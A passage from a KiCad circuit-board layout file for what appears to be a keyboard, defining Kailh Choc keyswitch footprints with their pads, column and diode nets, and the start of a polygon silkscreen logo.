(fp_line (start -9.5 -9.5) (end 9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -2.6 -3.1) (end 2.6 -3.1) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -3.1) (end 2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -6.3) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -2.6 -3.1) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(pad "" np_thru_hole circle (at -5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.22 -4.2) (size 0.9906 0.9906) (drill 0.9906) (layers *.Cu *.Mask))
(pad 1 thru_hole circle (at 0 5.9) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 18 /col1))
(pad 2 thru_hole circle (at -5 3.8) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 45 "Net-(D1_1-Pad2)"))
(pad "" np_thru_hole circle (at 0 0) (size 3.429 3.429) (drill 3.429) (layers *.Cu *.Mask))
)
(module switches:Choc_PG1350_MX_Spacing (layer F.Cu) (tedit 5F834A4E) (tstamp 5EDAB548)
(at 23 60)
(descr "Kailh \"Choc\" PG1350 keyswitch")
(tags kailh,choc)
(path /5EE22042)
(fp_text reference K1_0 (at 0 0) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value KEYSW (at 0 10.5) (layer Cmts.User) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -9.5 9.5) (end -9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 9.5) (end -9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 -9.5) (end 9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -9.5 -9.5) (end 9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -2.6 -3.1) (end 2.6 -3.1) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -3.1) (end 2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -6.3) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -2.6 -3.1) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(pad "" np_thru_hole circle (at -5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.22 -4.2) (size 0.9906 0.9906) (drill 0.9906) (layers *.Cu *.Mask))
(pad 1 thru_hole circle (at 0 5.9) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 14 /col0))
(pad 2 thru_hole circle (at -5 3.8) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 44 "Net-(D1_0-Pad2)"))
(pad "" np_thru_hole circle (at 0 0) (size 3.429 3.429) (drill 3.429) (layers *.Cu *.Mask))
)
(module switches:Choc_PG1350_MX_Spacing (layer F.Cu) (tedit 5F834A4E) (tstamp 5ECCBECF)
(at 229 41)
(descr "Kailh \"Choc\" PG1350 keyswitch")
(tags kailh,choc)
(path /5FD3AECE)
(fp_text reference K0_9 (at 0 0) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value KEYSW (at 0 10.5) (layer Cmts.User) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -9.5 9.5) (end -9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 9.5) (end -9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 -9.5) (end 9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -9.5 -9.5) (end 9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -2.6 -3.1) (end 2.6 -3.1) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -3.1) (end 2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -6.3) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -2.6 -3.1) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(pad "" np_thru_hole circle (at -5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.22 -4.2) (size 0.9906 0.9906) (drill 0.9906) (layers *.Cu *.Mask))
(pad 1 thru_hole circle (at 0 5.9) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 24 /col9))
(pad 2 thru_hole circle (at -5 3.8) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 43 "Net-(D0_9-Pad2)"))
(pad "" np_thru_hole circle (at 0 0) (size 3.429 3.429) (drill 3.429) (layers *.Cu *.Mask))
)
(module switches:Choc_PG1350_MX_Spacing (layer F.Cu) (tedit 5F834A4E) (tstamp 5ECCBF2C)
(at 210 29)
(descr "Kailh \"Choc\" PG1350 keyswitch")
(tags kailh,choc)
(path /5FD3AE92)
(fp_text reference K0_8 (at 0 0) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value KEYSW (at 0 10.5) (layer Cmts.User) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -9.5 9.5) (end -9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 9.5) (end -9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 -9.5) (end 9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -9.5 -9.5) (end 9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -2.6 -3.1) (end 2.6 -3.1) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -3.1) (end 2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -6.3) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -2.6 -3.1) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(pad "" np_thru_hole circle (at -5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.22 -4.2) (size 0.9906 0.9906) (drill 0.9906) (layers *.Cu *.Mask))
(pad 1 thru_hole circle (at 0 5.9) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 15 /col8))
(pad 2 thru_hole circle (at -5 3.8) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 42 "Net-(D0_8-Pad2)"))
(pad "" np_thru_hole circle (at 0 0) (size 3.429 3.429) (drill 3.429) (layers *.Cu *.Mask))
)
(module switches:Choc_PG1350_MX_Spacing (layer F.Cu) (tedit 5F834A4E) (tstamp 5ECCBFE6)
(at 191 23)
(descr "Kailh \"Choc\" PG1350 keyswitch")
(tags kailh,choc)
(path /5FD3AE0F)
(fp_text reference K0_7 (at 0 0) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value KEYSW (at 0 10.5) (layer Cmts.User) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -9.5 9.5) (end -9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 9.5) (end -9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 -9.5) (end 9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -9.5 -9.5) (end 9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -2.6 -3.1) (end 2.6 -3.1) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -3.1) (end 2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -6.3) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -2.6 -3.1) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(pad "" np_thru_hole circle (at -5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.22 -4.2) (size 0.9906 0.9906) (drill 0.9906) (layers *.Cu *.Mask))
(pad 1 thru_hole circle (at 0 5.9) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 21 /col7))
(pad 2 thru_hole circle (at -5 3.8) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 41 "Net-(D0_7-Pad2)"))
(pad "" np_thru_hole circle (at 0 0) (size 3.429 3.429) (drill 3.429) (layers *.Cu *.Mask))
)
(module switches:Choc_PG1350_MX_Spacing (layer F.Cu) (tedit 5F834A4E) (tstamp 5ECCBFC7)
(at 172 28.5)
(descr "Kailh \"Choc\" PG1350 keyswitch")
(tags kailh,choc)
(path /5FD3AE23)
(fp_text reference K0_6 (at 0 0) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value KEYSW (at 0 10.5) (layer Cmts.User) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -9.5 9.5) (end -9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 9.5) (end -9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 -9.5) (end 9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -9.5 -9.5) (end 9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -2.6 -3.1) (end 2.6 -3.1) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -3.1) (end 2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -6.3) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -2.6 -3.1) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(pad "" np_thru_hole circle (at -5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.22 -4.2) (size 0.9906 0.9906) (drill 0.9906) (layers *.Cu *.Mask))
(pad 1 thru_hole circle (at 0 5.9) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 20 /col6))
(pad 2 thru_hole circle (at -5 3.8) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 40 "Net-(D0_6-Pad2)"))
(pad "" np_thru_hole circle (at 0 0) (size 3.429 3.429) (drill 3.429) (layers *.Cu *.Mask))
)
(module switches:Choc_PG1350_MX_Spacing (layer F.Cu) (tedit 5F834A4E) (tstamp 5ECCBF4B)
(at 153 31)
(descr "Kailh \"Choc\" PG1350 keyswitch")
(tags kailh,choc)
(path /5FD3ADBA)
(fp_text reference K0_5 (at 0 0) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value KEYSW (at 0 10.5) (layer Cmts.User) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -9.5 9.5) (end -9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 9.5) (end -9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 -9.5) (end 9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -9.5 -9.5) (end 9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -2.6 -3.1) (end 2.6 -3.1) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -3.1) (end 2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -6.3) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -2.6 -3.1) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(pad "" np_thru_hole circle (at -5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.22 -4.2) (size 0.9906 0.9906) (drill 0.9906) (layers *.Cu *.Mask))
(pad 1 thru_hole circle (at 0 5.9) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 16 /col5))
(pad 2 thru_hole circle (at -5 3.8) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 39 "Net-(D0_5-Pad2)"))
(pad "" np_thru_hole circle (at 0 0) (size 3.429 3.429) (drill 3.429) (layers *.Cu *.Mask))
)
(module switches:Choc_PG1350_MX_Spacing (layer F.Cu) (tedit 5F834A4E) (tstamp 5EDAB4F7)
(at 99 31)
(descr "Kailh \"Choc\" PG1350 keyswitch")
(tags kailh,choc)
(path /5EEF9889)
(fp_text reference K0_4 (at 0 0) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value KEYSW (at 0 10.5) (layer Cmts.User) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -9.5 9.5) (end -9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 9.5) (end -9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 -9.5) (end 9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -9.5 -9.5) (end 9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -2.6 -3.1) (end 2.6 -3.1) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -3.1) (end 2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -6.3) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -2.6 -3.1) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(pad "" np_thru_hole circle (at -5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.22 -4.2) (size 0.9906 0.9906) (drill 0.9906) (layers *.Cu *.Mask))
(pad 1 thru_hole circle (at 0 5.9) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 5 /col4))
(pad 2 thru_hole circle (at -5 3.8) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 68 "Net-(D0_4-Pad2)"))
(pad "" np_thru_hole circle (at 0 0) (size 3.429 3.429) (drill 3.429) (layers *.Cu *.Mask))
)
(module switches:Choc_PG1350_MX_Spacing (layer F.Cu) (tedit 5F834A4E) (tstamp 5EDAAC45)
(at 80 28.5)
(descr "Kailh \"Choc\" PG1350 keyswitch")
(tags kailh,choc)
(path /5EEF6C30)
(fp_text reference K0_3 (at 0 0) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value KEYSW (at 0 10.5) (layer Cmts.User) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -9.5 9.5) (end -9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 9.5) (end -9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 -9.5) (end 9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -9.5 -9.5) (end 9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -2.6 -3.1) (end 2.6 -3.1) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -3.1) (end 2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -6.3) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -2.6 -3.1) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(pad "" np_thru_hole circle (at -5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.22 -4.2) (size 0.9906 0.9906) (drill 0.9906) (layers *.Cu *.Mask))
(pad 1 thru_hole circle (at 0 5.9) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 19 /col3))
(pad 2 thru_hole circle (at -5 3.8) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 38 "Net-(D0_3-Pad2)"))
(pad "" np_thru_hole circle (at 0 0) (size 3.429 3.429) (drill 3.429) (layers *.Cu *.Mask))
)
(module switches:Choc_PG1350_MX_Spacing (layer F.Cu) (tedit 5F834A4E) (tstamp 5EDAB5B7)
(at 61 23)
(descr "Kailh \"Choc\" PG1350 keyswitch")
(tags kailh,choc)
(path /5EE8C569)
(fp_text reference K0_2 (at 0 0) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value KEYSW (at 0 10.5) (layer Cmts.User) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -9.5 9.5) (end -9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 9.5) (end -9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 -9.5) (end 9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -9.5 -9.5) (end 9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -2.6 -3.1) (end 2.6 -3.1) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -3.1) (end 2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -6.3) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -2.6 -3.1) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(pad "" np_thru_hole circle (at -5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.22 -4.2) (size 0.9906 0.9906) (drill 0.9906) (layers *.Cu *.Mask))
(pad 1 thru_hole circle (at 0 5.9) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 17 /col2))
(pad 2 thru_hole circle (at -5 3.8) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 37 "Net-(D0_2-Pad2)"))
(pad "" np_thru_hole circle (at 0 0) (size 3.429 3.429) (drill 3.429) (layers *.Cu *.Mask))
)
(module switches:Choc_PG1350_MX_Spacing (layer F.Cu) (tedit 5F834A4E) (tstamp 5EDAAB67)
(at 42 29)
(descr "Kailh \"Choc\" PG1350 keyswitch")
(tags kailh,choc)
(path /5EEBC822)
(fp_text reference K0_1 (at 0 0) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value KEYSW (at 0 10.5) (layer Cmts.User) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -9.5 9.5) (end -9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 9.5) (end -9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 -9.5) (end 9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -9.5 -9.5) (end 9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -2.6 -3.1) (end 2.6 -3.1) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -3.1) (end 2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -6.3) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -2.6 -3.1) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(pad "" np_thru_hole circle (at -5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.22 -4.2) (size 0.9906 0.9906) (drill 0.9906) (layers *.Cu *.Mask))
(pad 1 thru_hole circle (at 0 5.9) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 18 /col1))
(pad 2 thru_hole circle (at -5 3.8) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 36 "Net-(D0_1-Pad2)"))
(pad "" np_thru_hole circle (at 0 0) (size 3.429 3.429) (drill 3.429) (layers *.Cu *.Mask))
)
(module switches:Choc_PG1350_MX_Spacing (layer F.Cu) (tedit 5F834A4E) (tstamp 5EDAA6FC)
(at 23 41)
(descr "Kailh \"Choc\" PG1350 keyswitch")
(tags kailh,choc)
(path /5EE18079)
(fp_text reference K0_0 (at 0 0) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value KEYSW (at 0 10.5) (layer Cmts.User) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -9.5 9.5) (end -9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 9.5) (end -9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 -9.5) (end 9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -9.5 -9.5) (end 9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -2.6 -3.1) (end 2.6 -3.1) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -3.1) (end 2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -6.3) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -2.6 -3.1) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(pad "" np_thru_hole circle (at -5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.22 -4.2) (size 0.9906 0.9906) (drill 0.9906) (layers *.Cu *.Mask))
(pad 1 thru_hole circle (at 0 5.9) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 14 /col0))
(pad 2 thru_hole circle (at -5 3.8) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 35 "Net-(D0_0-Pad2)"))
(pad "" np_thru_hole circle (at 0 0) (size 3.429 3.429) (drill 3.429) (layers *.Cu *.Mask))
)
(module silkscreens:safe_rust locked (layer B.Cu) (tedit 0) (tstamp 5EE0C344)
(at 186.43 52.99 190)
(attr virtual)
(fp_text reference G*** (at 0 0 190) (layer B.SilkS) hide
(effects (font (size 1.524 1.524) (thickness 0.3)) (justify mirror))
)
(fp_text value LOGO (at 0.75 0 190) (layer B.SilkS) hide
(effects (font (size 1.524 1.524) (thickness 0.3)) (justify mirror))
)
(fp_poly (pts (xy 3.410133 27.16612) (xy 3.917737 27.024859) (xy 4.372532 26.819581) (xy 4.750326 26.556438)
(xy 4.952383 26.345711) (xy 5.193906 26.004911) (xy 5.465817 25.558276) (xy 5.759835 25.020942)
(xy 6.067678 24.408042) (xy 6.381066 23.734712) (xy 6.381729 23.733235) (xy 6.681212 23.067199)
(xy 6.934015 22.508747) (xy 7.144355 22.049108) (xy 7.316455 21.679513) (xy 7.454533 21.391192)
(xy 7.56281 21.175375) (xy 7.645506 21.023293) (xy 7.706841 20.926176) (xy 7.751035 20.875254)
(xy 7.76028 20.868472) (xy 7.877291 20.840241) (xy 8.04065 20.878023) (xy 8.255 20.985457)
(xy 8.342963 21.044339) (xy 11.820461 21.044339) (xy 12.249866 20.409807) (xy 12.476177 20.062873)
(xy 12.642853 19.771163) (xy 12.770916 19.491802) (xy 12.88139 19.181916) (xy 12.931225 19.020215)
(xy 13.044404 18.83354) (xy 13.25956 18.705572) (xy 13.531076 18.638713) (xy 13.695938 18.588578)
(xy 13.921721 18.48847) (xy 14.163524 18.358628) (xy 14.197826 18.338186) (xy 14.438645 18.199411)
(xy 14.66861 18.078432) (xy 14.842554 17.998852) (xy 14.859 17.992669) (xy 15.085107 17.935909)
(xy 15.328582 17.912487) (xy 15.548584 17.922345) (xy 15.704272 17.965424) (xy 15.7411 17.993937)
(xy 15.770617 18.117624) (xy 15.749999 18.354478) (xy 15.679867 18.701248) (xy 15.560845 19.154686)
(xy 15.44135 19.558) (xy 15.139432 20.477546) (xy 14.838513 21.270101) (xy 14.538588 21.935671)
(xy 14.239656 22.474259) (xy 14.098468 22.68497) (xy 13.896795 22.931374) (xy 13.719926 23.064596)
(xy 13.552233 23.091845) (xy 13.378087 23.020332) (xy 13.375381 23.018567) (xy 13.234765 22.896743)
(xy 13.039099 22.684574) (xy 12.801932 22.398589) (xy 12.536816 22.05532) (xy 12.257302 21.671299)
(xy 12.175919 21.555295) (xy 11.820461 21.044339) (xy 8.342963 21.044339) (xy 8.524983 21.166182)
(xy 8.855243 21.423833) (xy 9.250423 21.76205) (xy 9.715164 22.18447) (xy 10.25411 22.694731)
